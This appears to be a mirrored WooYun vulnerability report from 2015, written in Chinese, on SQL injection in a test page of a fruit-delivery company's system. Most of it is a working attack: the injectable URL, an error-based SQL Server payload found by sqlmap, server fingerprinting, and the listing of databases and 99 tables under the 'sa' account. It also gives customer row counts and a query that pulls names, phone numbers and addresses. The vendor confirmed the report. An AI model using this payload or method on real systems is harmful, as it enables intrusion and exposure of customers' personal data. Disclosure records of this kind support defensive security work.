乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-19: 细节已通知厂商并且等待厂商处理中 2015-08-19: 厂商已经确认,细节仅向厂商公开 2015-08-29: 细节向核心白帽子及相关领域专家公开 2015-09-08: 细节向普通白帽子公开 2015-09-18: 细节向实习白帽子公开 2015-10-03: 细节向公众公开
SQL注入漏洞
http://hq.fruitday.com:1300/test/
刷新后抓post包
http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=%2FwEWBAKd1qmjCwLg2ZN%2BAsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw%2Fsj6SQ%3D%3D&__VIEWSTATE=%2FwEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs%2FMwjG%2BRntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-8-17
输入'
测试注入点
http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=%2FwEWBAKd1qmjCwLg2ZN%2BAsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw%2Fsj6SQ%3D%3D&__VIEWSTATE=%2FwEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs%2FMwjG%2BRntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-8-17*
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: http://hq.fruitday.com:1300/test/?Button1=%E5%AE%9D%E5%AE%9D%E6%A0%91%E8%AE%A2%E5%8D%95%E5%8F%91%E8%B4%A7%E4%BF%A1%E6%81%AF%E4%B8%8B%E8%BD%BD&__EVENTVALIDATION=/wEWBAKd1qmjCwLg2ZN+AsKGtEYCjOeKxgZbFZuhaBWiu7NPcvUNo8jE5zfxE0rx7qf7JmIw/sj6SQ==&__VIEWSTATE=/wEPDwULLTE3NTUxOTMwMTZkZFJW1VwGHd3j1GqENAXwHTs/MwjG+RntfJIDTWykxfY0&txtEndDate=2015-8-18&txtStartDate=2015-08-17' AND 4689=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4689=4689) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'RnJS'='RnJS---
web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005
数据库
available databases [5]:[*] fday[*] master[*] model[*] msdb[*] tempdb
当前数据库
current database: 'fday'current user: 'sa'
查看fday表
Database: fday[99 tables]+----------------------------+| BagOpLog || CCBack || CancelQueue || CardSales || Changes || CouponInputs || CouponRequest || CouponSales || CouponSalesReturn || DeliveryCar || DeliveryOrder || DeliveryWave || Department || Enterprise || Gifts || InputOrderJson || InvoiceReccord || InvoiceRequest || OkCardBill || OnlineBankBill || OnlineCoupon || OrderBak || Payments || PaymentsTemp || PreSellRule || Product || ProductItem || ReChargeInvoice || ReturnOrder || ShouldTransferAccounts || Staff || StateSyncQueue || TmalJson || UnionPayBillDetails || aa || dtproperties || fruit_Activity || fruit_ActivityOrderItem || fruit_Bag || fruit_BagItem || fruit_BagItemSet || fruit_BagPkg || fruit_BagType || fruit_CC || fruit_Complaint || fruit_ComplaintItem || fruit_Coupon || fruit_CouponType || fruit_Customer || fruit_DeliveryPerson || fruit_ExtraOrderType || fruit_ExtraTask || fruit_ExtraTaskItem || fruit_ExtraWarehouse || fruit_GoldenCardBill || fruit_GroupOrder || fruit_GroupOrderItem || fruit_Menu || fruit_OnlinePay || fruit_OrderItemV2 || fruit_OrderModifyLog || fruit_OrderOpRemark || fruit_OrderPayInfo || fruit_OrderPkg || fruit_OrderSerial || fruit_OrderV2 || fruit_PayMethodReccord || fruit_PayMethodReccordV1 || fruit_PkgItem || fruit_PkgType || fruit_Po || fruit_PoInStockDetails || fruit_PoItem || fruit_ProdSingleReturn || fruit_ProdType || fruit_RefundRecord || fruit_Stock || fruit_Store || fruit_StoreRequestBillItem || fruit_StoreRequestPkg || fruit_StoreRequstBill || fruit_SubMenu || fruit_Supplier || fruit_SupplierPayment || fruit_SupplierProd || fruit_UnPaidReccord || fruit_User || fruit_UserMenu || fruit_orderItemBak || fruit_orderPayment || material_RequestOrder || material_RequestOrderItem || preOrder || preOrderItem || sysdiagrams || tab_view_product_storage || test1 || view_OutPutStock || view_ReturnProd_OrderNum |+----------------------------+
select count(*) from fruit_Customer ;: '276588'select count(*) from preOrder;: '17019'select count(*) from fruit_User;: '377'
查看一条数据
SELECT TOP 1 age_Range, custom_Address, custom_Level, custom_Mobile, custom_Name, custom_Remark, custom_Tel, custom_Type, department, eAddress, eName, enterprise_Id, id, lastorder_Time, order_Count, salesMan, sex FROM fruit_Customer
order应该是订单 stock是库存 staff应该就是员工其他的表就不查看
危害等级:高
漏洞Rank:20
确认时间:2015-08-19 11:43
非常感谢您提供的信息,我们会尽快确认。
暂无